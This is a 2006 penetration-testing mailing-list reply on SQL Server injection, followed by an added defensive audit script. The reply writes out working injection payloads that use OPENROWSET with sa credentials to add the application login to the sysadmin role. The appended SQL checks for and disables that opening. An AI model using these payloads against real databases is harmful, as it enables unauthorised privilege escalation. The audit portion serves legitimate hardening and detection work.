Penetration Testing mailing list archives
RE: custom xp_cmdshell on SQL Server
From: "Victor Chapela" <victor () sm4rt com>
Date: Tue, 19 Sep 2006 19:20:32 -0500
Andy,
> Correct. But since I am injecting 'CREATE PROCEDURE' inside an OPENROWSET statement, that should solve the issue, as the SQL code inside the OPENROWSET is executed as a batch in itself (correct me if I am wrong).
You may be right and that would be a nice workaround for the create procedure lockout. Have you tried it locally with openrowset and does it work?
> I am running my code as an unprivileged user, but I escalated to 'sa' using OPENROWSET.
But I mean an unprivileged OS user. SQL Server does not always run as NT Authority/SYSTEM. If you are 'SA' you inherit SQL Server's privileges, and at the operating system level you can still be "guest" or, more frequently, an account named sql_server or something similar (which may not have access to execute system32 binaries).
> ' and 1=(select * from openrowset('SQLOLEDB','DRIVER={SQLServer};SERVER=<server>;UID=sa;PWD=<password>',N'select user; declare @u varchar(50); set @u = (select system_user); exec master.dbo.sp_addsrvrolemember @u, ''sysadmin'''))--

There is an error in this query I sent you. You should avoid declaring the variable, because it is being set within the context of the openrowset query: you will be adding SA to sysadmin the way it is. Try it this way:

' and 1=(select * from openrowset('SQLOLEDB','DRIVER={SQLServer};SERVER=<server>;UID=sa;PWD=<password>',N'select user; exec master.dbo.sp_addsrvrolemember <app user>, ''sysadmin'''))--

Obtain <app user> with [' and 1=system_user --] or [' and 1=user --]. In this case both should be the same.

Regards,
Victor
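A defender-side audit for the three conditions this exchange depends on (ad hoc OPENROWSET access being enabled, unexpected sysadmin membership, and the OS account the engine runs under). This is an added example, not code from Victor's or Andy's mail; it assumes a sysadmin session on the instance and uses only standard SQL Server catalog views and DMVs (sys.dm_server_services requires 2008 R2 SP1 or later).

```sql
-- Added audit script (example, not from the mailing-list thread).
-- Assumes: run as sysadmin on the instance under review.

-- 1. Is ad hoc distributed query access (OPENROWSET/OPENDATASOURCE)
--    enabled? The injected query in the thread needs it to be on.
--    xp_cmdshell is listed alongside because the thread is about replacing it.
SELECT name,
       value_in_use,
       CASE WHEN value_in_use = 1 THEN 'REVIEW: enabled' ELSE 'ok' END AS finding
FROM sys.configurations
WHERE name IN ('Ad Hoc Distributed Queries', 'xp_cmdshell');

-- 2. Who holds sysadmin? A successful sp_addsrvrolemember call leaves a
--    new row here; sorting by modify_date surfaces recent changes first.
SELECT m.name        AS member,
       m.type_desc   AS principal_type,
       m.create_date,
       m.modify_date
FROM sys.server_role_members AS rm
JOIN sys.server_principals  AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals  AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin'
ORDER BY m.modify_date DESC;

-- 3. Which OS account does the engine run as? Victor's point: 'sa' only
--    inherits this account's OS rights, which need not be SYSTEM.
SELECT servicename, service_account
FROM sys.dm_server_services;

-- 4. Hardening: turn ad hoc distributed queries off if nothing relies on it.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 0;
RECONFIGURE;
```

Step 2 is also worth scheduling as a recurring check: a login that appears in the sysadmin list without a matching change record is the direct trace of the technique discussed above.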